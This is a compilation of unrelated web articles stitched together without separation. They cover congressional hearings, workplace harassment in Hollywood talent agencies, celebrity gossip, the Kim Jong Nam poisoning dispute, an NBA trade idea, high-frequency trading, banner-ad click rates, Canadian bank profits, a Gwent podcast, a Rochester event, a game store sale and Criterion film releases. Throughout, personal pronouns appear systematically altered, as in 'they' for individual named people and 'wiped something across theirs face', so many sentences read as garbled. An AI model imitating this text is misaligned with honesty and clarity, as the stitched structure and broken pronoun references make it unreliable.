Meaning what? Trump Jr. has already talked with congressional investigators behind the scenes, but they avoided the TV cameras and only issued a written statement. An open hearing would be out of their control: They might have to swear an oath to tell the truth, be subject to questions from Democrats and who knows what else. The White House probably wants to avoid that.
Facebook and Twitter will play ball. Google, not so much
The two titans of social media said Wednesday that they'll send representatives to a Nov. 1 hearing before the Senate Intelligence Committee. Search behemoth Google, however, hasn't said whether it will accept the invitation from members of Congress. More from Recode.
Meaning what? Big Tech is walking a tightrope. It wants to stay on Congress' good side, but these companies do not want onerous new regulation or legislation — and they don't want to be made the scapegoat for the way Russian influencemongers might have used their services. So although Facebook and Twitter say they'll send people to this hearing, it probably won't be their famous CEOs, and whoever does show up may well be on guard.
The entertainment and media world has been upended in recent weeks by a deluge of allegations of sexual harassment and assault leveled at powerful and prominent figures, ranging from Harvey Weinstein, Brett Ratner and Kevin Spacey to journalists such as Mark Halperin and former NPR editor Mike Oreskes. The storm has yielded horrifying stories of abuse of power and sexual misconduct that have shocked even Hollywood veterans. It has also reinforced the stereotype of the casting couch as a mandatory form of subjugation for women seeking to advance in the industry.
But the heightened focus on work-related sexual harassment has also turned a spotlight on the prevalence of behavior that may be less gasp-inducing but is nonetheless pernicious. For many victims, sexual harassment in the workplace is akin to death by a thousand paper cuts — a steady drumbeat of low-grade annoyances that blur the line between simply boorish and outright criminal, but are all undeniably in violation of company harassment policies. Unwelcome comments on a person's appearance, repeated requests for dates, graphic questions about a person's sex life or dating history, or lewd remarks in general are an unfortunate fact of life for employees of both genders.
In the entertainment business — and particularly at the largest talent agencies — the combination of outsize egos, big profits, a highly competitive working environment and the glamour associated with film and TV can create conditions ripe for harassment to occur unchecked. All of these factors were in play in the case of two recent dismissals and one suspension at prominent agencies: Adam Venit, the longtime head of WME's motion picture group, is on leave from the agency as it probes an allegation of sexual harassment involving actor Terry Crews. Earlier, ICM Partners parted ways with Erik Horine, and CAA with Ryan Ly.
Horine has expressed regret for their actions and sought counseling and sensitivity training in the four months since they resigned under pressure from ICM.  They are not accused of engaging in any physical harassment of their co-workers. “I recognize that I can't undo the past, but at least I can make sure that I never again act in a manner that makes my co-workers or others upset or uncomfortable around me,” Horine said in a statement to Variety. “I am regretful every day for any pain I have caused. I will do everything possible to continue the personal growth that is needed on my part.”
Ly, dismissed in September, did not respond to multiple requests for comment. Venit and WME also declined to comment.
In many instances, experts say, a co-worker or supervisor who makes unwelcome remarks will escalate their or their actions over time. If crude comments and sophomoric attitudes are not challenged, the perpetrator is often emboldened to go further, according to Michelle Lee Flores, a labor law expert and partner with the L.A.-based firm Cozen O'Connor. “Some behavior may not rise to the level of being illegal but it is definitely something the company would not condone,” says Flores. “It's like pushing the envelope: If there are no consequences for certain behaviors, then they will push it a little beyond that. A lot of times it's unconscious for these people.”
The cost to a company can be significant if unchecked — not just in potential settlements to victims but in corporate culture. Harassment drives promising employees to leave, and overall performance can suffer due to weak morale or the lack of teamwork.
The unprecedented climate of the past few months, in which victims are speaking up in greater numbers, has clearly spurred companies, in and outside Hollywood, to be more vigilant in enforcing workplace standards. Experts say the long-term solution must include employers shifting the focus from a defensive stance to guard against liability to a proactive approach to ensure a healthy and welcoming environment for all employees.
On the downside, experts say there is a danger amid what some see as a national panic over harassment allegations that opportunities for women in business may be curbed, at least in the short term, if male leaders become more fearful of recruiting or promoting women, or of working with female business partners.
“Meetings aren't against the law. Sexually predatory ones are,” says Noreen Farrell, executive director of San Francisco-based nonprofit Equal Rights Advocates. “Most players in Hollywood understand the difference. As a practical matter, excluding women or men — both of whom can be victimized — from meetings would shut Hollywood and every industry down. The answer is not to exclude anyone from meetings, but to keep them professional, no matter where they take place.”
The key to rooting out harassment is to encourage victims to speak up and to empower supervisors to recognize problems early. But both of those things are easier said than done, experts say. “Disrespectful behavior is the gateway drug to illegal behavior,” Flores says. They have worked with numerous entertainment firms over the years in establishing company policies, reporting and enforcement mechanisms. One thing they most stresses with clients is to train supervisors to keep a watchful eye on morale and to encourage leaders to set a good example.
Fear of retaliation and fear of compromising future job opportunities are the biggest deterrents for victims to speak out in the face of behavior that crosses the line. This sentiment was put in stark relief by the number of A-list actores who came forward with years- and decades-old allegations of sexual misconduct — and worse — involving Weinstein.
But attitudes may well be undergoing a seismic generational shift, as evidenced by the extraordinary outpouring from women and men over the past few months.
Wendy Walsh, a relationship expert, radio personality and author, was among the women who broke their silence earlier this year on allegations of harassment by former Fox News star anchor Bill O'Reilly as part of a New York Times exposé published in April. O'Reilly was fired from the network barely three weeks later.
When Walsh was debating whether to go public in the Times about their O'Reilly experiences, they consulted with many friends. Those 45 and over were more likely to advise against speaking out than those who were younger. “This behavior has become so normalized to women of [the over-45] generation that nobody thought anything could be done about it. It's just ‘the way things are,' ” they say.
Walsh, who had been a semi-regular guest on “The O'Reilly Factor,” had the choice to speak freely because they never made a complaint or sought a financial settlement from O'Reilly or Fox News. “My silence is not for sale,” they say.
The events of the past 18 months — starting with the sexual harassment lawsuit that led to the ouster of Fox News CEO Roger Ailes in July 2016 — have irrevocably emboldened women in the workplace to fight discrimination in all its forms, Walsh observes.  They are heartened by the fact that their moral courage on O'Reilly led to many new advertisers aligning with their daily radio program on KFI-AM Los Angeles.
“It's exciting to see this giant cultural shift happening before our eyes,” Walsh says. “This is really a movement.”
The lovely Olivia Wilde is kicking off 2012 with a new man and a new 'do! Not only has the former "House M.D." star been seen several times with "Saturday Night Live" funny guy (and quite the ladies' man) Jason Sudeikis, but on Wednesday they were photographed leaving the Andy LeCompte Salon in West Hollywood, California, with some shorter, lighter strands. That's right, 27-year-old Olivia has traded their signature long locks for wavy, shoulder-length tresses in an ombre hue, although they maintained their long bangs. Do you like the look?
Photos: Olivia and Jason Go Public With Romance
View photos
View photos
Sarah Palin Has a New 'Do
I'm a fan. While it's true that Olivia would look hot with any hairstyle, this one is less severe and polished than the one they donned in the past. The "In Time" actor also looks younger and more refreshed, like she's ready for a new period of their life, especially after last year's split with their husband of seven years, Italian filmmaker Tao Ruspoli. The real question is whether Jason likes the look. Lately, the two have been practically inseperable as they hit a post-"SNL" bash, caught a University of Kansas basketball game, strolled in NYC, and more -- always with hearts and flowers in their eyes. Something tells me he'll approve!
Drew Barrymore Beams In New Engagement Pic
Follow omg! on Twitter
CLOSE Within days of the assassination of Kim Jong-un's half-brother Kim Jong Nam, a surveillance video surfaced showing a woman behind them appearing to put something over their mouth. USA TODAY
Malaysia's Prime Minister Najib Razak said North Korea was "effectively holding our citizens hostage, is in total disregard of all international law and diplomatic norms,” (Photo: Dita Alangkara, AP)
North Korea and Malaysia barred each other's citizens Tuesday from exiting their respective countries in a tit-for-tat move that comes amid an escalating dispute over the poisoning death of Kim Jong Nam, the North Korean leader's estranged half brother.
The North's official Korean Central News Agency said that Pyongyang was banning Malaysians from leaving the country "until the safety of the diplomats and citizens of (North Korea) in Malaysia is fully guaranteed through the fair settlement of the case that occurred in Malaysia."
Malaysia is looking for seven North Korean suspects over Kim's unusual death in a crowded airport terminal in Kuala Lumpur on Feb. 13. Three of them, including an official at the North Korean Embassy, are believed to still be in Malaysia.
Malaysian Prime Minister Najib Razak said the travel ban was tantamount to hostage-taking and said their country would immediately respond in kind by banning North Koreans from leaving Malaysia. "This abhorrent act, effectively holding our citizens hostage, is in total disregard of all international law and diplomatic norms,” Najib said.
Read more:
Before diplomatic ties disintegrated over the investigation into Kim's death, Malaysia had been one of the few places in the world where North Koreans could travel without a visa. As a result, for years, it's been a quiet destination for Northerners looking for jobs, schools and business deals.
About 1,000 North Koreans are believed to be working in Malaysia, according to the Associated Press.
Malaysian Deputy Foreign Minister Reezal Marican told reporters at parliament that there are 11 Malaysians in North Korea: Three working at the Malaysian Embassy, two United Nations workers and six family members.
Malaysia has not directly accused North Korea of being behind the attack on Kim, who was killed at the airport with the nerve agent VX, a banned chemical weapon.
Two women, one from Vietnam and one from Indonesia, have been charged with their murder. Both say they were duped into thinking they were playing a harmless prank. They went up behind Kim as they waited for a flight and wiped something across theirs face.
However, experts say the oily poison was likely made in a sophisticated state weapons laboratory, and North Korea is widely believed to possess large quantities of chemical weapons, including VX.​
North Korea meanwhile has slammed the investigation as biased and demanded Malaysia hand over the body. The North has also refused to acknowledge that the victim is Kim Jong Nam or a relative of its leader, Kim Jong-un. Instead, it refers to them as Kim Chol, the name on the diplomatic passport they were carrying when they died.
Read or Share this story: http://usat.ly/2n9fzpe
1 of 5
Joe Murphy/Getty Images
Memphis Grizzlies Receive: SF/PF Maurice Harkless, C Meyers Leonard, C Jusuf Nurkic, 2018 lottery-protected first-round pick, 2019 second-round pick (via Los Angeles Lakers or Minnesota Timberwolves)
Portland Trail Blazers Receive: C Marc Gasol, SF/PF James Ennis
Firing head coach David Fizdale, getting slammed by injuries and losing 18 of the past 21 games has not changed the Memphis Grizzlies' party line: They're not prepared to sell off Mike Conley and Marc Gasol for tanking's sake.
"We think our window is still very much open with Mike and Marc," general manager Chris Wallace told ESPN.com's Zach Lowe. "I think we'll be heard from the rest of this year, and in years to come."
That's all well and good. But franchise aims shift quickly amid downward spirals. The Grizzlies will lose enough with Conley and Gasol to preserve their lottery odds. Keeping the former is the only play anyway. Conley has four years (including this one) and $126 million left on their deal. No team absorbs that, let alone surrenders value for it, when he's coping with Achilles issues.
Gasol is in slightly different territory. They have a player option for 2019-20, ahead of their age-35 season. Their value only goes down from here. He's amenable to a trade, according to Lowe, and Memphis has to at least consider moving them when he'll be treated as an over-the-hill expiring contract in less than one year's time.
Extracting this combination of assets from the Portland Trail Blazers helps the Grizzlies straddle two windows. They won't be good enough to ruin this season's nosedive and are securing a pu-pu platter of assets that'll help them into 2018-19 and beyond.
Jusuf Nurkic is a legitimate successor to Gasol. He's inferior in nearly every area of the game but remains a serviceable passer, post scorer and dropback rim protector. They don't turn 24 until August and shouldn't come close to costing the $72.3 million Gasol is owed through 2019-20.
Maurice Harkless is a great hedge against Tyreke Evans' upcoming free agency. They cannot jumpstart pick-and-rolls in volume, and their shooting is shaky. But they have hit threes at or around the league average in the past and remains a defensive pest on the wings. The Grizzlies should have no trouble swallowing Meyers Leonard's contract if it means getting a first-rounder. He's shooting 53.8 percent from deep (7-of-13) in limited action, and they can try grooming them in the image of a souped-up Jarell Martin.
Portland shouldn't have to think long or hard about this deal. Shedding Leonard and avoiding Nurkic's next contract offsets what they'll pay Gasol, and he's an ideal big for head coach Terry Stotts' conservative defensive approach. They don't need to be especially mobile to protect the house while dropping back.
Committing around $90 million to Gasol, Damian Lillard, C.J. McCollum and Evan Turner is no joke. But again: The Blazers are on the cusp of cannonballing into similar territory next season. They might as well pay Gasol what Nurkic and Leonard will combine to make through each of the next two years, then revisit their direction in 2020, when both Big Burrito and Turner are off the ledger.
~~~~~~~
Everybody knows the dice are loaded, everybody rolls with their fingers crossed.
Everybody knows that the war is over, everybody knows the good guys lost.
Everybody knows the fight is fixed;the poor stay poor, the rich get rich.
That's how it goes…And everybody knows
~~~~~~
Last week Bill Maher took the Occupy Wall Street movement to task for not getting more directly involved in the political process. Basically, they dismissed the plans that OWS has prepared for this summer, suggesting that they're ineffective, and a little ‘too last year' to be of any consequence. In a way, they were echoing the old trope about the movement, that they lack ‘focus,' and don't have any demands of substance. While it's my experience that Maher is pretty well-informed, I felt that they were a little unnecessarily glib in this instance. The Occupy Movement can be forgiven if it's still marshaling its forces, as they may be fighting one of the most important battles in America's history. Wall Street is like the Hydra, a mythical beast with many heads; and like the Hydra, every time you cut off one of its heads, two more grow back.
Information on the nuts and bolts of Wall Street activities isn't widespread; the world of finance is never-ending staccato bursts of numbers that can only be interpreted through complex formulas that layperson aren't privy to wrapped in a lexicon so dense it could be a separate language. Mainstream media rarely gives it the attention it merits, because financial news seldom lends itself to the quick-punch delivery that their medium requires. Even the cable stations that specialize in ‘business news' don't dig much past the surface. Players in that world recognize the power of information, and they spend it (legally and illegally) like currency.
Like the songs says, “Everybody knows the fight is fixed,” but that doesn't necessarily mean that everybody knows how ‘the dice are loaded,' and very few of us know how many ways the fix is in. For instance there's a little tidbit I ran across in a weekly column called News of the Weird, which describes itself as being, “The gold standard in reporting the bizarre and the ridiculous.” I've followed ‘NOTW' since its inception, and it's always good for some laughs, as well as items that make you shake your head at how crazy this world can be. Very often, it will include an item that just give you the chills:
Only about 16 percent of stock market transactions consist of what most people think of as buying or selling of company or mutual fund shares (“real” investors, interacting with actual brokers). The rest, according to analysis by Morgan Stanley's Quantitative and Derivative Strategies group and covering October to December 2011, were performed by computers acting automatically, at staggeringly high frequency, using software algorithms, buying or selling mindlessly, based on what trading firms needed to fill out their portfolios' profitably on a second-by-second basis. [Financial Times, 4-24-2012]
Only 16% of all stock market transactions are being made by sentient beings. A staggering 84% of all trading is done by a process known as ‘High Frequency Trading. Three years ago, it was a new innovation that had already raised some concerns about unfair or unethical practices. From the New York Times:
Nearly everyone on Wall Street is wondering how hedge funds and large banks like Goldman Sachs are making so much money so soon after the financial system nearly collapsed. High-frequency trading is one answer. And when a former Goldman Sachs programmer was accused this month of stealing secret computer codes — software that a federal prosecutor said could “manipulate markets in unfair ways” — it only added to the mystery. Goldman acknowledges that it profits from high-frequency trading, but disputes that it has an unfair advantage.
Goldman Sachs?! An unfair advantage?!
Unthinkable. Of course at the time Goldman Sachs was registering nearly twice the activity of its closest competitor.
Here, The Times breaks down how high frequency trading works:
…as new marketplaces have emerged, PCs have been unable to compete with Wall Street's computers. Powerful algorithms — “algos,” in industry parlance — execute millions of orders a second and scan dozens of public and private marketplaces simultaneously. They can spot trends before other investors can blink, changing orders and strategies within milliseconds. High-frequency traders often confound other investors by issuing and then canceling orders almost simultaneously. Loopholes in market rules give high-speed investors an early glance at how others are trading. And their computers can essentially bully slower investors into giving up profits — and then disappear before anyone even knows they were there.
Here in 2012, it's no longer just Goldman Sachs; it's the way most of the big boys operate. The vast majority of the industry is operated from the top of the mountain, where the air is too thin and rare for mere mortals.
You would think that kind of leg up on the competition would satisfy even the greediest of Wall Street fat cats, but you would, of course, be wrong. Because at the volume and speed they're trading, they're making money whether their properties rise or fall:
High-frequency traders also benefit from competition among the various exchanges, which pay small fees that are often collected by the biggest and most active traders — typically a quarter of a cent per share to whoever arrives first. Those small payments, spread over millions of shares, help high-speed investors profit simply by trading enormous numbers of shares, even if they buy or sell at a modest loss.
It's sort of like the man who fishes by throwing dynamite in the lake; they know he's going to fill their nets. High-frequency trading fills the nets, but it creates myriad problems for anyone else with a taste for fish.
There are ‘Black Swan Events,' momentary price crashes, caused by the properties of the systems the traders are using. They indirectly manipulate the fates of companies and billions of dollars in revenue, just in the way their programs operate. There's no real way to predict how much the U.S. economy can be altered by these ‘glitches,' but there's little comfort in this nugget of information:
They also say that the ten stocks most susceptible to flash crashes and rises are international banks. This, they say, “hints at a hidden relationship between these ultrafast ‘fractures' and the slow ‘breaking' of the global financial system post-2006.”
Ha-ha ! Whoops! I'm sure if they just clear out their cookies and re-boot…
But that's not the only drawback, there are also Dark Pools, whole segments of trade closed off to traders left on the outside by the technology. Here's a link to a site that provides more analysis of the effects of HFT, in case you'd like to delve further.
Me? I've seen enough. I will not pretend to any great knowledge of economics, and I understand that there will be ‘experts' who will mock my rudimentary understanding of the things I've discussed here. I tell you now: I don't get it... And if things were going well, I wouldn't give it a second thought, probably. We don't all need to know how a jet engine works to get on a plane. But when I see smoke coming out of the turbine, I know we're in trouble.
Everybody knows.
Sign up to have all the AddictingInfo you can handle delivered directly to your email here!
Everything is going wrong for Facebook lately, it seems. First, there was the very public spat with GM–which the car giant seemed to time just so it could poo-poo Facebook's grand debut as a publicly traded company (although now it's trying to make up)–, then the technical glitch that confused investors at the IPO, not to mention the controversy about Facebook's underwriters, and finally, last week, some pretty disappointing earnings results. But the one thing that must be keeping Mark Zuckerberg up at night these days is the creeping suspicion among investors that online ads are not quite the moneymaker they thought they would be–even on Facebook.
The bad news on that front, though, just keeps coming. Only last week, in fact, research emerged hinting that, in the world of online advertising, the best ad may be no ad at all.
In a recent experiment conducted by the Advertising Research Foundation (ARF) a blank banner ad received more clicks than the average Facebook ad, twice as many as your average “branded” display ad (a static ad which promotes a brand rather than a specific offer or call to action), and only one click in ten thousand less than the average banner ad.
The experiment began when ARF executive Ted McConnell and their friends–including an astrophysicist–decided to test how much clicking on banner ads represented actual user engagement versus how much was just noise–people clicking on the ad by mistake. To do so, the team created and trafficked a blank ad, under the assumption that clicks on an empty ad would qualify as noise. They wired it to measure everything that happened to it, anywhere it ran, and programmed it to ask users who clicked through whether they had done so by mistake or out of curiosity. They even monitored things like mouseovers, and used a heat map to guard against click fraud. (Heat maps detect fraudulent clicks because bots–automated software applications that are sometimes used to inflate click-through rates — tend to click on the same spot every time).
The results are shocking. The click-through rate on the blank ads was 0.08 per cent, just 0.01 per cent short of the average ad. According to independent research from Web Trends, the average click rate on a Facebook ad is only 0.051 per cent, meaning that people click on about one of every 2,000 ads. If that's the case, then the blank ad performed 60 per cent better.
It gets worse. According to McConnell, roughly half of the total clicks (nearly four clicks per every 10,000 impressions) were unintentional.
It's only a single experiment, of course, but the findings are pretty damning for a company like Facebook, which reportedly relies on advertising for 85 per cent of its revenue. The social network, for its part, has been fighting tooth and nail to stem the tide, encouraging companies to think differently about social advertising and even partnering with ComScore to show that visibility on the site leads to more purchases (and this from a company that has always been loathe to publicize its metrics). Still, it won't be an easy task to convince clients to keep shelling out for clicks when half of them may be meaningless. Even if companies do keep buying ad space, it's entirely possible that they will want to pay less per click.
Online advertising is a $100 billion industry, replete with creative prodigies and sophisticated tracking programs, and armed with all the personal info about customers that social media sites can provide. Yet, in spite of all that money, talent and data, an empty ad still outperforms the average. It might too early to tell how this will shake out, but studies like McConnell's show that we're overdue for a rethink in terms of how to advertise on the Internet. The best way to start might be to find a better surrogate for attention than the lowly click.
Canada's two biggest banks continue to churn out blockbuster profits in an environment that is, in significant ways, "as good as it gets" for the country's large lenders.
Royal Bank of Canada and Toronto-Dominion Bank both reported profit of $2-billion or more for the second successive quarter, establishing a new benchmark that they will be expected to clear in future results.
Both banks are benefiting from their diversity, with better earnings everywhere from personal and commercial banking to wealth management. And there is little on the horizon that is likely to slow them down.
Story continues below advertisement
At TD, "it's one of those quarters where everything was performing exceptionally well," chief financial officer Colleen Johnston said in an interview.
At RBC, the wealth management division shone, and the bank expects it to stay bright because rising stocks keep convincing clients to put more money into the markets.
At both banks, provisions for potential losses on loans have fallen to near historic lows. "The credit environment is as good as it gets," National Bank Financial analyst Peter Routledge wrote in a note to clients. Investors can "conclude from this insight that the environment can only get worse and that credit losses will become a headwind to earnings … eventually. But eventually is probably a fair distance into the future."
RBC's profit jumped 15 per cent to $2.2-billion in the fiscal second quarter from a year earlier, while TD's rose 14 per cent to $2.1-billion after stripping out one-time items.
However, some shorter-term comparisons are not as compelling. Canadian personal and commercial banking drives the bulk of both bank's profits, and core earnings from these units fell 4 per cent at RBC and were flat at TD, relative to the preceding quarter.
Still, the major threat to the banks' run of $2-billion-plus profits appears to be the possibility of an interest rate increase. Few observers see such an increase as likely any time soon. But RBC's chief financial officer Janice Fukakusa said in an interview that banks are always susceptible to surprises, particularly "some rate increase that isn't well forecasted into the market."
Banks have adapted their business models to make money in a low-interest-rate environment, they said. A sudden, unexpected rate upheaval would require lenders to rework their operations in short order, rather than allowing them to retool more methodically over time.
Story continues below advertisement
Story continues below advertisement
In the absence of any such shock, the banks are poised to keep churning out the profits.
Even TD, which has been more negative about the Canadian banking outlook than its peers, told investors they should not fear any major changes to the overall operating environment for the remainder of 2014. "This is a better outcome than we were expecting when we started the year," chief executive officer Ed Clark said.
However, the bank raised a caution flag about its U.S. personal and commercial banking arm. Although the unit's profit rose in the second quarter, the rest of the year is expected to be challenging. "The U.S. operating environment for banks is quite tough right now," CFO Ms. Johnston said. Loan margins are getting squeezed because banks are all chasing the same big clients, leading them to cut prices, and the regulatory environment has changed dramatically.
At RBC, the trouble spot has been the Caribbean. Since striking a $2-billion acquisition in the region in 2008, RBC has struggled to keep its Caribbean loan losses in order, leading to a recent restructuring and the sale of its Jamaican operations at a loss.
Still, the diversity of each bank's operations have helped them withstand these headwinds, as well as a cooling in the mortgage loan market – something that has been long expected and has finally arrived.
"Certainly we've had a bit of a slower start to the mortgage season," RBC president and incoming CEO Dave McKay said on the bank's conference call. But "slowing is not a bad thing necessarily," they added, alluding to Canadians' high levels of indebtedness.
Welcome to Commander's Horn, Episode 7, Hosted by Dane “McBeard”, and Josh “Greyboxer”
This week, we try to keep calm, as we are less than a week from the Gwent Closed Beta.
Warsaw games week has passed, but we had a listener attend the event and report back on a few things they saw. Also, we've had a lot of great developer interaction in our various chat and forum channels.
Later, we talk about leaders of Scoia'Tael and Skellige, and which new cards have the best synergy.
Finally, we go through some community threads and direct messages to us.
E-mail us at commandershornpodcast@gmail.com or contact us on Twitter @commandershorn
Read more for details and sources used for the podcast!
Sources for this podcast:
Gwent: Gnimsh vs. Lothar @ Warsaw Games Week: https://twitter.com/commandershorn/status/786969005902991361
https://twitter.com/commandershorn/status/786969005902991361 “Countdown to Gwent” McBeard's Twitch Channel (Weekdays 3pm-6pm EST): https://www.twitch.tv/mcbearded
https://www.twitch.tv/mcbearded GwentDB (All cards + deckbuilder): http://www.gwentdb.com/
http://www.gwentdb.com/ Gwent Forum Thread “Precise “Tribal” Description”: http://forums.cdprojektred.com/threads/136971-Precise-quot-tribal-quot-descriptions?p=3125161&viewfull=1
Gwent Forums: http://forums.cdprojektred.com/forums/281-GWENT
Gwent Facebook: https://www.facebook.com/PlayGwent
Gwent Twitter: @playgwent
CHARLOTTE, N.Y. -- A special event Saturday evening showcased new development at the Port of Rochester, new restaurants opening and the natural beauty that comes with living by the water.
The city of Rochester's Celebrate City Living event highlighted the reasons people looking for a change of pace should move to this area of the city.
Charlotte organizations, realtors and services available to residents were represented.
"You know, Charlotte has a totally different feel and vibe than Beechwood or the 19th Ward and the reasons why someone would live there are all wonderful, but different," program manager Lia Anselm said. "So Celebrate City Living tries to show off all the characters and the different housing possibilities in each of them."
Visitors were able to meet business owners, sample local cuisine, listen to music and see the tall ship Andalucia in the harbor.
The winter holidays are fast approaching, and the Fantasy Flight Games Holiday Sale has begun!
You can celebrate the holidays right by picking out a new favorite from among the hundreds of products featured on this year's Holiday Sale. Whether you're looking for a present for friends and family or just picking out an extra stocking stuffer for yourself, our 2015 Holiday Sale is the perfect place to complete your shopping with a single order. The sale begins at 2:00 P.M. CST on November 18th and lasts until 11:59 P.M. CST on November 30th, but many of the hottest items will sell out quickly, so be sure to head to our webstore and pick out your favorite games as soon as possible.
Games for Every Player
Whether the gamers in your life prefer board games, card games, miniatures games, roleplaying games, or even books, there's something for everyone at the FFG Holiday Sale.
For the first time, one of our Living Card Games® has found its way to the Holiday Sale: all of the Battle Packs and deluxe expansions for Warhammer: Invasion are now part of the Holiday Sale, allowing you or a loved one to journey into the Old World and take part in the unending battles of the Warhammer Fantasy universe. Whether you only pick up a few Battle Packs to get a taste of the game beyond your Core Set, or you dive deep into expanding your game with new cards and strategies from cycles of Battle Packs and larger deluxe expansions, you'll find a satisfying experience of the wars for the Old World with Warhammer: Invasion.
There are also new entries to the board and card games category of the Holiday Sale. Among old classics like Lord of the Rings: The Confrontation and Black Gold, you'll find an invitation to conquer Westeros with Battles of Westeros and its multiple expansions: you can take the field and command the armies of the North as Robb Stark or ride down your foes with Ser Jaime Lannister and their troops. Alternatively, you can open the door to a career of interstellar commerce with Merchant of Venus, another new addition to the Holiday Sale.
If you're gathering with friends or family during these holidays, you may prefer to look at two new party games making their debut on the Holiday Sale this year. The Last Banquet invites players to partake in a variety of clever scenarios, whether you're trying to poison the king or rescue a princess. Blood Bound, on the other hand, pits two clans of vampires against each other in a social game of deduction, accusations, and cunning treachery.
If you're searching for the perfect gift for the miniatures lover in your life, you could take a long look at our stock of Dust and Dust Premium Figures. Compatible with two popular miniatures games—Dust Tactics and Dust Warfare—these figures are beautifully crafted and offer an invitation to an alternate history where The Great War never ended. Alternatively, if your family's mood is more Lovecraftian this holiday season, you can browse our collection of Arkham Horror Premium Figures, encompassing both investigators and monsters and bringing games like Arkham Horror, Mansions of Madness, and Eldritch Horror to life with beautifully painted figures.
An assortment of roleplaying games also find a home in this year's Holiday Sale. The Anima roleplaying game line is still available, inviting you to immerse yourself in a world of dark fantasy that merges Western and Eastern archetypes and storytelling. On the other hand, you may travel to the grim darkness of the 41st millennium with RPGs like Only War, Deathwatch, Black Crusade, Rogue Trader, and the first edition of Dark Heresy.
If you prefer to curl up with a book as snow falls outside, you may just find a new and entertaining read at the 2015 Holiday Sale. An assortment of novels, set in the Arkham Horror, Android, and Tannhäuser universes, are available for you to escape to new worlds of mystery, horror, and darkness. If you're looking for a way to return to Westeros or tempting madness with forbidden tomes, you may also be intrigued by the art books that showcase the art of the Cthulhu Mythos.
Will you conquer Westeros at the head of a massive army? Will you travel across the galaxy in a instant, bearing a cargo of priceless goods? Will you find glory and honor among the battles of the Old World? During the holidays, you can find games for yourself and every other gamer in your life at the 2015 FFG Holiday Sale!
Local Customers: If you live in the Twin Cities area, visit the Fantasy Flight Games Center, where the same great inventory is available. Note: Webstore orders cannot be shipped to the Games Center, and no products will be reserved.
Retailers: Log into our B2B (Business to Business) store to enjoy the sale for yourself! Don't have a B2B account? Contact our sales department at [email protected]
Head to our webstore now to start the holidays off right!
My Dinner with Andre (1981), Jonathan Demme's A Master Builder (2013), and André Gregory & Wallace Shawn: 3 Films (three-disc set). On June 23, it will release Bernhard Wicki's The Bridge (1959) and Terry Gilliam's The Fisher King (1991). And on June 30, it will release Bob Rafelson's Five Easy Pieces (1970) and Jaromil Jire' Valerie and Them Week of Wonders (1970).
My Dinner with Andre
In Louis Malle's captivating and philosophical My Dinner with André, actor and playwright Wallace Shawn sits down with friend and theater director André Gregory at an Upper West Side restaurant, and the two proceed into an alternately whimsical and despairing confessional on love, death, money, and all the superstition in between. Playing variations on their own New Yorkhoned personas, Shawn and Gregory, who also wrote the screenplay, dive in with introspective, intellectual gusto, and Malle captures it all with a delicate, artful detachment. A fascinating freeze-frame of cosmopolitan culture, My Dinner with André remains a unique work in cinema history.
Special Features: High-definition digital restoration, with uncompressed monaural soundtrack on the Blu-ray
Interview from 2009 with actors and cowriters André Gregory and Wallace Shawn, conducted by their friend the filmmaker Noah Baumbach
"My Dinner with Louis," a 1982 episode of the BBC program Arena in which Shawn interviews director Louis Malle
PLUS: A booklet featuring an essay by critic Amy Taubin and the prefaces written by Gregory and Shawn for the 1981 publication of the film's screenplay A Master Builder
Twenty years after their brilliant cinema-theater experiment Vanya on 42nd Street, Wallace Shawn and André Gregory reunited to produce another idiosyncratic big-screen version of a classic play, this time Henrik Ibsen's Bygmester Solness (Master Builder Solness). Brought pristinely to the screen by Jonathan Demme, this is a compellingly abstract reimagining; it features Shawn (who also wrote the adaptation) as a visionary but tyrannical middle-aged architect haunted by figures from their past, most acutely an attractive, vivacious young woman (the breathtaking newcomer Lisa Joyce) who has appeared on their doorstep. Also featuring standout supporting performances from Julie Hagerty, Larry Pine, and Gregory, A Master Builder, like Vanya, is the result of many years of rehearsals, a living, breathing, constantly shifting work that unites theater, film, and dream.
Special Features: High-definition digital master, supervised by director of photography Declan Quinn, with 5.1 surround DTS-HD Master Audio soundtrack on the Blu-ray
New interview with director Jonathan Demme, director and star André Gregory, and screenwriter and actor Wallace Shawn, conducted by film critic David Edelstein
New conversation between actors Julie Hagerty and Lisa Joyce
New program featuring Gregory, Shawn, and their friend the author Fran Lebowitz in conversation
Trailer
PLUS: An essay by film critic Michael Sragow André Gregory & Wallace Shawn: 3 Films
When André Gregory and Wallace Shawntheater directors, writers, actors, and longtime friendssat down for a stimulating meal in 1981's My Dinner with André, they not only ended up with one of cinema's unlikeliest iconic scenarios but launched a film collaboration that would continue to pay creative dividends for decades. The subsequent projects they made together for the screen1994's Vanya on 42nd Street, a passionate read-through of Anton Chekhov's Uncle Vanya, and 2014's striking Henrik Ibsen interpretation A Master Builderare penetrating works that exist on the edge of theater and film, and that both emerged out of many years of rehearsals with loyal troupes of actors. Gregory and Shawn's unique contributions to the cinematic landscape are shape-shifting, challenging, and entertaining works about the process of creation.
BOX SET CONTENT:
1. My Dinner with Andre
2. Vanya on 42nd Street
3. A Master Builder
The Bridge
The astonishing The Bridge, by Bernhard Wicki, was the first major antiwar film to come out of Germany after World War II, as well as the nation's first postwar film to be widely shown internationally, even securing an Oscar nomination. Set near the end of the war, it follows a group of teenage boys in a small town as they contend with everyday matters like school, girls, and parents, before enlisting as soldiers and being forced to defend their home turf in a confused, terrifying battle. This expressively shot, emotionally bruising drama dared to humanize young German soldiers at a historically tender moment, and proved influential for the coming generation of New German Cinema auteurs.
Special Features: New 2K digital restoration, with uncompressed monaural soundtrack on the Blu-ray
New interview with writer Gregor Dorfmeister, on whose autobiographical novel the film is based
New interview with filmmaker Volker Schlöndorff about the film's impact on German cinema
Interview from 1989 with director Bernhard Wicki
Excerpt from a 2007 documentary by Elisabeth Wicki-Endriss, Wicki's wife, featuring test reel footage from the shoot
PLUS: An essay by film critic Terrence Rafferty The Fisher King
A fairy tale grounded in poignant reality, the magnificent, Manhattan-set The Fisher King, by Terry Gilliam, features Jeff Bridges and Robin Williams in two of their most brilliant roles. Bridges plays a former radio shock jock reconstructing their life after a scandal, and Williams is a homeless man on a quest for the Holy Grailwhich they believe to be hidden somewhere on the Upper West Side. Unknowingly linked by their pasts, the two men aid each other on a fanciful journey to redemption. This singular American odyssey features a witty script by Richard La Gravenese, evocative cinematography by Roger Pratt, and superb supporting performances by Amanda Plummer and an Oscar-winning Mercedes Ruehl, all harnessed by Gilliam into a humane, funny modern-day myth.
Special Features: New, restored 2K digital transfer, approved by director Terry Gilliam, with 5.1 surround DTS-HD Master Audio soundtrack on the Blu-ray
Audio commentary featuring Gilliam
